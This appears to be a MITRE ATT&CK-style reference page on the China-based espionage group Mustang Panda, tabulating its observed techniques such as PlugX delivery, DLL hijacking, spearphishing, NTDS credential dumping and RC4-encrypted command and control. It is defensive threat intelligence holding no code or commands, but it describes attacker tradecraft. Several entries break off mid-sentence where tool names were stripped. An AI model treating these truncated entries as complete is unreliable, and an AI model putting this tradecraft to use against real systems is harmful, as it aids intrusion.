Mustang Panda is a China-based cyber espionage threat actor that was first observed in 2017 but may have been conducting operations since at least 2014. Mustang Panda has targeted government entities, nonprofits, religious, and other non-governmental organizations in the U.S., Europe, Mongolia, Myanmar, Pakistan, and Vietnam, among others.[1][2][3]
Domain | ID | Name | Use | |
---|---|---|---|---|
Enterprise | T1583 | .001 | Acquire Infrastructure: Domains |
Mustang Panda have acquired C2 domains prior to operations.[3][5][8] Mustang Panda registered adversary-controlled domains during RedDelta Modified PlugX Infection Chain Operations that were re-registrations of expired domains.[7] |
Enterprise | T1071 | .001 | Application Layer Protocol: Web Protocols |
Mustang Panda has communicated with its C2 via HTTP POST requests.[2][3][5][8] Mustang Panda used HTTP POST messages for command and control from PlugX installations during RedDelta Modified PlugX Infection Chain Operations.[7] |
Enterprise | T1560 | .001 | Archive Collected Data: Archive via Utility |
Mustang Panda has used RAR to create password-protected archives of collected documents prior to exfiltration.[3][9] |
.003 | Archive Collected Data: Archive via Custom Method |
Mustang Panda has encrypted documents with RC4 prior to exfiltration.[9] |
||
Enterprise | T1119 | Automated Collection |
Mustang Panda used custom batch scripts to collect files automatically from a targeted system.[3] |
|
Enterprise | T1547 | .001 | Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder |
Mustang Panda has created the registry key Mustang Panda used Run registry keys with names such as |
Enterprise | T1059 | .001 | Command and Scripting Interpreter: PowerShell |
Mustang Panda has used malicious PowerShell scripts to enable execution.[1][2] Mustang Panda used LNK files to execute PowerShell commands leading to eventual PlugX installation during RedDelta Modified PlugX Infection Chain Operations.[7] |
.003 | Command and Scripting Interpreter: Windows Command Shell |
Mustang Panda has executed HTA files via cmd.exe, and used batch scripts for collection.[2][9] |
||
.005 | Command and Scripting Interpreter: Visual Basic |
Mustang Panda has embedded VBScript components in LNK files to download additional files and automate collection.[1][2][3] |
||
Enterprise | T1074 | .001 | Data Staged: Local Data Staging |
Mustang Panda has stored collected credential files in |
Enterprise | T1573 | .001 | Encrypted Channel: Symmetric Cryptography |
Mustang Panda has encrypted C2 communications with RC4.[5] |
Enterprise | T1585 | .002 | Establish Accounts: Email Accounts |
Mustang Panda has leveraged the legitimate email marketing service SMTP2Go for phishing campaigns.[6] |
Enterprise | T1546 | .003 | Event Triggered Execution: Windows Management Instrumentation Event Subscription |
Mustang Panda's custom ORat tool uses a WMI event consumer to maintain persistence.[3] |
Enterprise | T1480 | Execution Guardrails |
Mustang Panda included the use of Cloudflare geofencing mechanisms to limit payload download activity during RedDelta Modified PlugX Infection Chain Operations.[7] |
|
Enterprise | T1052 | .001 | Exfiltration Over Physical Medium: Exfiltration over USB |
Mustang Panda has used a customized PlugX variant which could exfiltrate documents from air-gapped networks.[9] |
Enterprise | T1203 | Exploitation for Client Execution |
Mustang Panda has exploited CVE-2017-0199 in Microsoft Word to execute code.[1] Mustang Panda used the GrimResource exploitation technique via specially crafted MSC files for arbitrary code execution during RedDelta Modified PlugX Infection Chain Operations.[7] |
|
Enterprise | T1083 | File and Directory Discovery |
Mustang Panda has searched the entire target system for DOC, DOCX, PPT, PPTX, XLS, XLSX, and PDF files.[9] |
|
Enterprise | T1564 | .001 | Hide Artifacts: Hidden Files and Directories |
Mustang Panda's PlugX variant has created a hidden folder on USB drives named Mustang Panda stored encrypted payloads associated with PlugX installation in hidden directories during RedDelta Modified PlugX Infection Chain Operations.[7] |
Enterprise | T1574 | .001 | Hijack Execution Flow: DLL |
Mustang Panda has used a legitimately signed executable to execute a malicious payload within a DLL file.[2][5][4] Mustang Panda used DLL search order hijacking on vulnerable applications to install PlugX payloads during RedDelta Modified PlugX Infection Chain Operations.[7] |
Enterprise | T1070 | .004 | Indicator Removal: File Deletion |
Mustang Panda will delete their tools and files, and kill processes after their objectives are reached.[3] |
Enterprise | T1105 | Ingress Tool Transfer |
Mustang Panda has downloaded additional executables following the initial infection stage.[5] |
|
Enterprise | T1036 | .004 | Masquerading: Masquerade Task or Service |
Mustang Panda masqueraded Registry run keys as legitimate-looking service names such as |
.005 | Masquerading: Match Legitimate Resource Name or Location |
Mustang Panda has used names like |
||
.007 | Masquerading: Double File Extension |
Mustang Panda has used an additional filename extension to hide the true file type.[1][2] |
||
Enterprise | T1095 | Non-Application Layer Protocol |
Mustang Panda communicated over TCP 5000 from adversary administrative servers to adversary command and control nodes during RedDelta Modified PlugX Infection Chain Operations.[7] |
|
Enterprise | T1027 | Obfuscated Files or Information |
Mustang Panda has delivered initial payloads hidden using archives and encoding measures.[1][2][3][5][4][6] |
|
.013 | Encrypted/Encoded File |
Mustang Panda stored installation payloads as encrypted files in hidden folders during RedDelta Modified PlugX Infection Chain Operations.[7] |
||
.016 | Junk Code Insertion |
Mustang Panda has used junk code within their DLL files to hinder analysis.[9] |
||
Enterprise | T1588 | .004 | Obtain Capabilities: Digital Certificates |
Mustang Panda acquired Cloudflare Origin CA TLS certificates during RedDelta Modified PlugX Infection Chain Operations.[7] |
Enterprise | T1003 | .003 | OS Credential Dumping: NTDS |
Mustang Panda has used vssadmin to create a volume shadow copy and retrieve the NTDS.dit file. Mustang Panda has also used |
Enterprise | T1566 | .001 | Phishing: Spearphishing Attachment |
Mustang Panda has used spearphishing attachments to deliver initial access payloads.[5][4][10] Mustang Panda leveraged malicious attachments in spearphishing emails for initial access to victim environments in RedDelta Modified PlugX Infection Chain Operations.[7] |
.002 | Phishing: Spearphishing Link |
Mustang Panda has delivered malicious links to their intended targets.[8] Mustang Panda distributed malicious links in phishing emails leading to HTML files that would direct the victim to malicious MSC files if running Windows based on User Agent fingerprinting during RedDelta Modified PlugX Infection Chain Operations.[7] |
||
Enterprise | T1598 | .003 | Phishing for Information: Spearphishing Link |
Mustang Panda has delivered web bugs to profile their intended targets.[6] |
Enterprise | T1057 | Process Discovery |
Mustang Panda has used |
|
Enterprise | T1090 | Proxy |
Mustang Panda proxied communication through the Cloudflare CDN service during RedDelta Modified PlugX Infection Chain Operations.[7] |
|
Enterprise | T1219 | .002 | Remote Access Tools: Remote Desktop Software |
Mustang Panda has installed TeamViewer on targeted systems.[3] |
Enterprise | T1091 | Replication Through Removable Media |
Mustang Panda has used a customized PlugX variant which could spread through USB connections.[9] |
|
Enterprise | T1053 | .005 | Scheduled Task/Job: Scheduled Task |
Mustang Panda has created a scheduled task to execute additional malicious software, as well as maintain persistence.[2][3][8] |
Enterprise | T1518 | Software Discovery |
Mustang Panda has searched the victim system for the |
|
Enterprise | T1608 | Stage Capabilities |
Mustang Panda has used servers under their control to validate tracking pixels sent to phishing victims.[6] |
|
.001 | Upload Malware |
Mustang Panda has hosted malicious payloads on DropBox including PlugX.[6] Mustang Panda staged malware on adversary-controlled domains and cloud storage instances during RedDelta Modified PlugX Infection Chain Operations.[7] |
||
Enterprise | T1553 | .002 | Subvert Trust Controls: Code Signing |
Mustang Panda used legitimate, signed binaries such as |
Enterprise | T1218 | .004 | System Binary Proxy Execution: InstallUtil |
Mustang Panda has used |
.005 | System Binary Proxy Execution: Mshta |
Mustang Panda has used mshta.exe to launch collection scripts.[3] |
||
.007 | System Binary Proxy Execution: Msiexec |
Mustang Panda initial payloads downloaded a Windows Installer MSI file that in turn dropped follow-on files leading to installation of PlugX during RedDelta Modified PlugX Infection Chain Operations.[7] |
||
.014 | System Binary Proxy Execution: MMC |
Mustang Panda used Microsoft Management Console Snap-In Control files, or MSC files, executed via MMC to run follow-on PowerShell commands during RedDelta Modified PlugX Infection Chain Operations.[7] |
||
Enterprise | T1082 | System Information Discovery |
Mustang Panda has gathered system information using Mustang Panda captured victim operating system type via User Agent analysis during RedDelta Modified PlugX Infection Chain Operations.[7] |
|
Enterprise | T1016 | System Network Configuration Discovery |
Mustang Panda has used |
|
Enterprise | T1049 | System Network Connections Discovery |
Mustang Panda has used |
|
Enterprise | T1204 | .001 | User Execution: Malicious Link |
Mustang Panda has sent malicious links including links directing victims to a Google Drive folder.[1][8][6] Mustang Panda distributed hyperlinks that would result in an MSC file running a PowerShell command to download and install a remotely-hosted MSI file during RedDelta Modified PlugX Infection Chain Operations.[7] |
.002 | User Execution: Malicious File |
Mustang Panda has sent malicious files requiring direct victim interaction to execute.[1][2][9][5][10][6] Mustang Panda distributed malicious LNK objects for user execution during RedDelta Modified PlugX Infection Chain Operations.[7] |
||
Enterprise | T1102 | Web Service |
Mustang Panda has used DropBox URLs to deliver variants of PlugX.[6] |
|
Enterprise | T1047 | Windows Management Instrumentation |
Mustang Panda has executed PowerShell scripts via WMI.[2][3] |